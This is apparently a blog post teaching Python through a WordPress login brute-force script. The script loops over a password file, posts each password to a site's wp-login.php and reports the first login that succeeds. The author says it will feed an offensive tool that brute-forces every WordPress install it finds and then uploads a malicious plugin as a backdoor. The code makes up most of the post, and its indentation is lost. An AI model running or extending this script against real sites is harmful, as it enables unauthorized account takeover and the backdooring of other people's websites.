This post is all about python and not the end result, for brute forcing you can use a lot of options, good ones too like WPSCAN/Hydra etc but we want to code our own that will go into WebPwn tool.

The Code

#Import the libraries we need
import requests
import sys
#Assign values based on script arguments
host = sys.argv[1]
user = sys.argv[2]
passfile = sys.argv[3]
#Open the password file
with open(passfile, "r") as ifile:
#loop over each password aka each line in the file
for line in ifile:
password = line.rstrip("\n")
#Print current password we are trying
print("Trying: " + password)
#Make the login request
resp = requests.post(host+'/wp-login.php', data = {'log':user, 'pwd': password })
#If no ERROR aka we logged in, print the login values
if "Invalid" not in resp.text:
print("Login with user: "+user+" & pass: " +password)
break

What Next

This is of course a really simple example, you can now extend it in many ways or look to brute other services by replacing response check and endpoint.

This code will added to WebPWN so that we can automatically brute any WP install we find, the WebPWN code will then upload a malicious plugin as a backdoor.

Try and test this on other services and see what caveats you find, testing and playing with simple code like this is a great way to learn programming and python as we don’t have any complexity getting in our way. Of course, this code is not optimal nor would you deploy it into production as you can easily make requests to anything you want and inject a terminating character to ignore the WP endpoint.